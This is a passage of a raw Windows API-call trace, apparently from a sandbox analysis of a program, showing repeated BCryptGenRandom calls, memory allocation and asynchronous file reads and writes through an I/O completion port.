hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0138.605] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.605] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0138.606] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.606] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.606] free (_Block=0x3e305b8) [0138.606] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.606] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.606] free (_Block=0x1fa91d0) [0138.606] free (_Block=0x77d7a8) [0138.606] free (_Block=0x1fa90b8) [0138.607] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.607] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.618] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0138.619] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0138.619] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.619] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.619] free (_Block=0x3e305b8) [0138.619] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.619] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.620] free (_Block=0x1fa91d0) [0138.620] free (_Block=0x77d7a8) [0138.620] free (_Block=0x1fa90b8) [0138.620] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0138.620] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.634] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.635] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0138.636] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.636] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0138.636] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.636] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.636] free (_Block=0x3e305b8) [0138.636] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.636] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.637] free (_Block=0x1fa91d0) [0138.637] free (_Block=0x77d7a8) [0138.637] free (_Block=0x1fa90b8) [0138.637] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.637] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.638] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.638] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.659] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3dd8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.674] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1580, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.675] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.684] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.684] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0138.684] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.685] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0138.685] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.685] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.685] free (_Block=0x3e305b8) [0138.685] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.685] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.685] free (_Block=0x1fa91d0) [0138.685] free (_Block=0x77d7a8) [0138.686] free (_Block=0x1fa90b8) [0138.686] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0138.686] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.687] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.688] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0138.688] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.689] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0138.689] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.689] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.689] free (_Block=0x3e305b8) [0138.689] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.689] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0138.689] free (_Block=0x1fa91d0) [0138.689] free (_Block=0x2071c20) [0138.689] free (_Block=0x1fa90b8) [0138.690] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.690] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.690] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.692] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.725] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.725] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.733] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0138.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0138.734] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.734] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.734] free (_Block=0x3e305b8) [0138.734] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.734] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.735] free (_Block=0x1fa91d0) [0138.735] free (_Block=0x77d7a8) [0138.735] free (_Block=0x1fa90b8) [0138.735] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0138.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.743] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.744] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0138.744] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.744] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0138.744] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.744] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.744] free (_Block=0x3e305b8) [0138.745] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.745] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.745] free (_Block=0x1fa91d0) [0138.745] free (_Block=0x77d7a8) [0138.745] free (_Block=0x1fa90b8) [0138.745] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0138.745] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.747] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.747] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0138.748] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.748] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0138.748] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.748] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.748] free (_Block=0x3e305b8) [0138.748] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.748] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.749] free (_Block=0x1fa91d0) [0138.749] free (_Block=0x77d7a8) [0138.749] free (_Block=0x1fa90b8) [0138.749] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.757] CloseHandle (hObject=0x308) returned 1 [0138.757] free (_Block=0x3d70450) [0138.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.768] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.769] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.775] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.775] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0138.775] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.776] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0138.776] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.776] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.776] free (_Block=0x3e305b8) [0138.776] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.776] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.776] free (_Block=0x1fa91d0) [0138.776] free (_Block=0x77d7a8) [0138.776] free (_Block=0x1fa90b8) [0138.776] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.776] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.777] WriteFile (in: hFile=0x338, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x42b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.777] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.825] CloseHandle (hObject=0x170) returned 1 [0138.825] free (_Block=0x3df0008) [0138.825] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.827] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.836] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0138.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.846] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x16f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0138.851] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.859] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0138.859] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.860] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0138.860] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.860] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.860] free (_Block=0x3e305b8) [0138.860] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.860] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.860] free (_Block=0x1fa91d0) [0138.860] free (_Block=0x77d7a8) [0138.861] free (_Block=0x1fa90b8) [0138.861] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.861] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.870] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.878] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1350, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.883] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.892] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.892] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0138.892] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.892] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0138.893] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.893] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.893] free (_Block=0x3e305b8) [0138.893] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.893] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.893] free (_Block=0x1fa91d0) [0138.893] free (_Block=0x77d7a8) [0138.893] free (_Block=0x1fa90b8) [0138.893] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.902] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x2b10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0138.902] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.912] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4fdc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.922] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.925] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1864, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, 